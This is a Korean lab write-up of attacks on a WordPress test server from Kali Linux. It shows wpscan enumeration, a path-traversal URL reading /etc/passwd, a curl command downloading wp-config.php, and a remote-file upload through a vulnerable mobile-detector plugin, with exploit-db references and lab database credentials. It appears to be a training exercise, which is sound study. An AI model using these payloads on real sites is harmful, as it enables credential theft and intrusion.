WordPress 취약점 공격 - LFI, AFD, AFU
System/Cybersecurity

WordPress 취약점 공격 - LFI, AFD, AFU

원문 : https://condencia.postype.com/post/2402942

원문 등록 일시 : 2018.09.04


실습환경 : Kali Linux

· wpscan : WordPress 취약점을 진단해주는 툴


1
root@kali:/ wpscan -u [IP address]:7070/wordpress 
cs

19

192.168.86.129:7070/phpmyadmin 접속

계정명 : root, 비밀번호 : server



· LFI(Local File Inclusion) : 로컬 서버에 있는 파일을 실행에 포함시킴

https://www.exploit-db.com/exploits/40850


1
http://[server IP address]:7070/wordpress?wpv-image=../../../etc/passwd
cs


위의 예시를 브라우저의 url 입력란에 입력하면 로컬 서버의 /etc/passwd에 있는 계정 정보를 보여준다.


· AFD(Arbirtary File Download) : 허가되지 않은 파일을 다운로드

https://www.exploit-db.com/exploits/39593


파일 다운로드


1
2
3
4
5
6
root@kali:/ curl http://[IP address]/wordpress/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
-o example-wp-config.php
 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   302  100   302    0     0    302      0  0:00:01 --:--:--  0:00:01  294k
cs


다운로드된 파일 확인

1
2
3
4
5
6
7
8
9
10
11
root@kali:/ vim example-wp-config.php
 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wordpress/mdocs-posts/ was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.86.129 Port 7070</address>
</body></html>
cs



· AFU(Arbitary File Download) : 취약한 플러그인이 파일을 업로드할 수 있도록 한다.

https://www.exploit-db.com/exploits/39891



1
2
http://[IP address]:7070/wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src= http://file.gamedonga.co.kr/files/images/news_images_b/bono080523.jpg
# src : 업로드하고자 하는 파일 주소
cs


그림과 같이 원하는 파일(bono080523.jpg)이 업로드된 것을 확인할 수 있다.